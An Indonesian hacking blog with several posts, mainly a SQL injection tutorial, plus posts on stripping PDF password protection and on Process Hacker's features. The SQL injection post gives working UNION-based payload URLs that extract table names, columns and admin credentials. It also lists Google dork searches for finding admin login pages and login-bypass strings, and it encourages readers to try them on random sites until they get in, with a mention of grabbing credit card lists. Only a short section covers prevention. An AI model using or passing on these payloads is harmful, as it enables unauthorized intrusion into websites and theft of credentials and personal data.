Selamat Datang Di Blogger System Hack Rebel Semoga Bermanfaat Jangan Lupa Follow Blog # Follback

Kamis, 14 Maret 2013

0 Situs yang Dapat Membuat Kamu Serasa Jadi Hacker ^_^



Hacker Typer








Kalau Anda adalah orang yang senang menonton film-film bertema Sci-Fi terutama yang menampilkan adegan hacking, atau adegan dimana pemeran utamanya mengetik tugas pada command-line maka Anda harus mencoba ini: Hacker Typer.




Tips menyenangkan:
  1. Buka laptop Anda di tempat umum, atau yang gampang dilihat orang.
  2. Jalankan browser, kunjungi Hacker Typer.
  3. Buat browser Anda menjadi fullscreen (tekan F11).
  4. Silakan mengetik sesuka Anda, apapun yang Anda ketik akan menjadi baris-baris yang rapi.
  5. Kalau sudah yakin ada orang lain yang memperhatikan, tekan:
    • Alt 3X untuk memunculkan pesan “ACCESS GRANTED”
    • Caps Lock 3X untuk memunculkan pesan “ACCESS DENIED”
    • Tekan Esc untuk menghilangkan pesan tsb.
  6. Selalu pasang muka serius.
  7. Kalau sudah banyak orang yang berkumpul dibelakang Anda, berdiri dan segera pergi (sok misterius :P ).

    Hehehe, gimana udah berasa jadi Hacker? yaa... walaupun hanya sebuah rekayasa, tapi yang penting kita udah bisa merasakan jadi seorang hacker :D


    Kalo Masih Blom Ngerti Silahkan Komentar di bawah postingan ini :)


    Semoga Artikel Ini Bermanfaat Untuk Sobat Blogger ^_^ Salam Blogwalking :)

Jumat, 01 Februari 2013

0 Tools Untuk Memodifikasi Tempate Blog

galan adalah keberhasilan yang tertunda dan Cinta adalah patah hati yang tertunda (sebagian) Tips Software New
tools generator for template modificationMemodifikasi template adalah tugas pertama sebelum membuat blog para blogger di isi dengan informasi - informasi yang bermanfaat karena dengan memodifikasi template membuat sebagian orang merasa nyaman dengan ke indahan template itu sendiri . Beberapa fasilitas telah di sediakan pada pengguna blogger , namun fasilitas tersebut mungkin mempunyai kekurangan .

Berikut ini beberapa tools yang mungkin bisa membantu memperbaiki kekurangan tersebut dalam mendesain atau memodifikasi sebuah template, hasil tools berikut sudah termasuk  kode CSS dan HTML jadi intinya tinggal menempatkan hasil yang diperoleh pada tempatnya dengan mengikuti petunjuk yang juga mudah dimengerti dan sudah pasti gratis untuk menggunakan tools ini
.
Berikut ini adalah tools yang dimaksud:


  • Template Shacker, aplikasi ini adalah software pembuat template baik web ataupun blog secara offline hanya dengan menginstalnya di computer anda, penggunaannya cukup mudah karena tidak harus paham benar dengan CSS dan HTML code karena menggunakan model WYSIWYG (What You See Is What You Get). Intinya tidak perlu waktu lama untuk memahami cara kerja aplikasi ini. Jika tertarik silahkan Download disini..
  • Menu Generator, masih sama dengan aplikasi diatas software ini menggunakan model WYSIWYG, anda bisa membuat sendiri model menu yang anda inginkan mulai dari model yang sederhana sampai yang kompleks seperti menu pulldown. Jika tertarik silahkan Download disini..
  • Screen Rules, seperti namanya tools ini berfungsi untuk menentukan ukuran secara tepat dari elemen yang hendak dibuat dari template yang akan dibuat dalam satuan pixels (px) secara horisontal ataupun vertikal.Jika tertarik silahkan Download disini..
Selamat mencoba..

Selasa, 01 Januari 2013

0 Menembus & Menghapus Password File PDF

Menembus Batasan Password File PDF, Menghapus Password File PDF Dan Menghilangkan Password File PDF, Crack Password File PDF sampai Melakukan Perubahan, Penambahan Serta Penghapusan Konten Pada File PDF Tersebut.
Mungkin Anda pernah menjumpai file PDF yang tidak dapat dicetak, diedit, atau bahkan tidak dapat dibuka (bukan karena rusak). Hal seperti ini terjadi karena sang pembuat document tidak ingin karyanya untuk dicetak, dirubah, ataupun dibuka di perangkat yang tidak memiliki hak terhadap file PDF tersebut. Di sini Anda akan dituntun untuk menembus batasan ini, menjadikan PDF yang Anda inginkan agar dapat dilakukan pencetakan maupun pengeditan.
Ikuti petunjuk di bawah ini :
1. Siapkan file PDF yang terpassword, sebagai contoh adalah CN-ZINE-15 (Codenesia Magazine edisi 15), sebuah majalah elektronik dari  Codenesia (Forum sebelah), dimana setiap keluar edisi, selalu diproteksi dengan password. Entah untuk apa, atau mungkin memancing kreatifitas pembaca untuk membuat artikel seperti ini.
2. Buka file PDF yang Anda inginkan tersebut dengan PDF editor/viewer yang menurut Anda paling lengkap dan dapat diandalkan. Nah saya menggunakan Nitro PDF sebagai program aplikasi untuk membukanya. Ketika dibuka, hasilnya kurang lebih akan seperti ini :

Terdapat tulisan “This document is restricted or has limited access to some features” atau semacamnya yang menyatakan bahwa file PDF tersebut memiliki batasan pengeditan. Langkah kedua ini hanyalah untuk memastikan saja, tidak perlu dilakukan bila Anda sudah mengetahui bahwa file tersebut telah direkayasa sedemikian rupa.
3. Kini kita tau bahwa file PDF ini telah diproteksi. Selanjutnya download dan buka file program aplikasi bernama “PDF Decrypter Pro”. Klik “Decrypt PDF” lalu pilih dokumen yang ingin dihilangkan batasannya.

Hasilnya seperti gambar di atas, sekarang buka file PDF seperti biasa, kita coba melakukan sedikit pengeditan. Hasilnya akan seperi ini :

Walla & Voillaaaa !! :D
PDF sudah berubah, selamat belajar dan semoga bermanfaat ;-)

0 Pengertian, Tutorial & Tools SQL Injection

Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.

SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut:
1. BSQL Hacker

Dikembangkan oleh Portcullis Labs, BSQL Hacker adalah SQL injection yang di rancang untuk mengeksplor hampir seluruh jenis data base
[DOWNLOAD BSQL HACKER]

2. The Mole

Mole adalah tool open source, Mole dapat melewati beberapa sistem IPS / IDS yang menggunakan filter generik, mole dapat meng eksplor hanya dengan menggunak URL yang rentan dan string valid.
[DOWNLOAD THE MOLE]

3. Pangolin

Diproduksi oleh perusahaan yang sama yang membuat JSky, NOSEC, Pangolin adalah tool injeksi SQL secara menyeluruh pada web dengan user-friendly GUI dan support hampir untuk selur data base.
[DOWNLOAD PANGOLIN]

4. SQLMap
SQLMap adalah tool open source yang di jalankan menggunakan command dan support untuk data base MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
[DOWNLOAD SQLMAP]

5. Havij

Tool ini sudah sangat terkenal di gunakan oleh para peretas di seluruh dunia, Havij di kembangkan oleh programer iran dengan GUI yang sederhana meng injek SQL menggunakan harvij kemungkinan berhasil adalah 95 persen dan masih banyak lagi kelebihan havij.
[DOWNLOAD HAVIJ]

6. Enema SQLi

Berbeda dengan kebanyakan tool-tool injek yang di buat otomatis, enema bukanlah tool otomatis, enam tool yang di namis yang memang di rancang untuk profesional.
[DOWNLOAD ENEMA SQLI]

7. SQL Ninja

Sql Ninja di kembangkan oleh icesurfer tool yang di rancang untuk targen server SQL, data base fingerprint, dan semu kemampuan untuk mengendalikan database yang rentan injek.
[DOWNLOAD SQL NINJA]

8. SQL Sus
Sql Sus merupakan tool open source antar mukanya berbasis perintah, anda dapat mengambil data base, mendownload file dari data base server dan masih banya lagi.
[DOWNLOAD SQL Sus]

9. Safe SQL Injector

Safe SQL Injector terkenal dengan kemudahan penggunaannya Safe3 SI menawarkan serangkaian fitur yang memungkinkan deteksi otomatis dan eksploitasi kelemahan SQL injection dan pengambilalihan database server.
[DOWNLOAD SAFE SQL INJECTOR]

10. SQL Poizon

SQL Poizon memanfaatkan mesin pencarian Dork untuk menjaring situs-situs yang rentan untuk di injek. Sql Poizon memiliki browser yang telah terintegrasi di dalamnya.
[DOWNLOAD SQL POIZON]

Manual Tutorial SQL Injection

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x
[ Langkah 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100′ atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Langkah 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya…
    gunakan perintah: order byContoh:[site]/berita.php?id=-100+order+by+1– atau
    [site]/berita.php?id=-100+order+by+1/*Ceklah secara Langkah by Langkah (satupersatu)…
    Misal:[site]/berita.php?id=-100+order+by+1–
    [site]/berita.php?id=-100+order+by+2–
    [site]/berita.php?id=-100+order+by+3–
    [site]/berita.php?id=-100+order+by+4–Sehingga muncul error atau hilang pesan error…
    Misal: [site]/berita.php?id=-100+order+by+9–Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8–
[ Langkah 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–ok seumpama yg keluar angka 5gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–Lihat versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Langkah 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhirCode:[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–Se’umpama table yang muncul adalah “admin”
[ Langkah 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. tables+where+table_schema=database()–
[ Langkah 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa–Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htmContoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E–
[ Langkah 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhirContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–Contoh kata yang keluar adalah id,username,passwordContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
[ Langkah 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Source HN Forum
SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.

Contoh Sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘– setelah nama username
Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php
Contoh script php semula :
$query = “select id,name,email,password,type,block from user ” .
“where email = ‘$Email’ and password = ‘$Password’”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = “select id,name,email,password,type,block from user”.
“where email = ‘$Email’”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a’='a
Password : ` or `a’='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a’='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.

(Source: singgahpay.blogspot)

Semoga berbagai artikel tersebut bermanfaat, thanks to google and blogspot. :)
                                         
                                          Sumber BinusHacker.net

0 Process Hacker Tools

Process Hacker adalah software dengan fitur yang dikemas untuk memanipulasi proses dan service pada komputer. Process Hacker merupakan opensource dan gratis yang digunakan untuk menampilkan proses yang ada dikomputer dan editor memori dengan fitur-fitur unik seperti penjelasan berikut:

Processes

  • View processes in a tree view with highlighting
  • View detailed process statistics and performance graphs
  • Process tooltips are detailed and show context-specific information
  • Select multiple processes and terminate, suspend or resume them
  • (32-bit only) Bypass almost all forms of process protection
  • Restart processes
  • Empty the working set of processes
  • Set affinity, priority and virtualization
  • Create process dumps
  • Use over a dozen methods to terminate processes
  • Detach processes from debuggers
  • View process heaps
  • View GDI handles
  • Inject DLLs
  • View DEP status, and even enable/disable DEP
  • View environment variables
  • View and edit process security descriptors
  • View image properties such as imports and exports

Threads

  • View thread start addresses and stacks with symbols
  • Threads are highlighted if suspended, or are GUI threads
  • Select multiple threads and terminate, suspend or resume them
  • Force terminate threads
  • View TEB addresses and view TEB contents
  • (32-bit only) Find out what a thread is doing, and what objects it is waiting on
  • View and edit thread security descriptors

Tokens

  • View full token details, including user, owner, primary group, session ID, elevation status, and more
  • View token groups
  • View privileges and even enable, disable or remove them
  • View and edit token security descriptors

Modules

  • View modules and mapped files in one list
  • Unload DLLs
  • View file properties and open them in Windows Explorer

Memory

  • View a virtual memory list
  • Read and modify memory using a hex editor
  • Dump memory to a file
  • Free or decommit memory
  • Scan for strings

Handles

  • View process handles, complete with highlighting for attributes
  • Search for handles (and DLLs and mapped files)
  • Close handles
  • (32-bit only) Set handle attributes – Protected and Inherit
  • Granted access of handles can be viewed symbolically instead of plain hex numbers
  • View detailed object properties when supported
  • View and edit object security descriptors

Services

  • View a list of all services
  • Create services
  • Start, stop, pause, continue or delete services
  • Edit service properties
  • View service dependencies and dependents
  • View and edit service security descriptors

Network

  • View a list of network connections
  • Close network connections
  • Use tools such as whois, traceroute and ping

Download Process Hacker  Tools: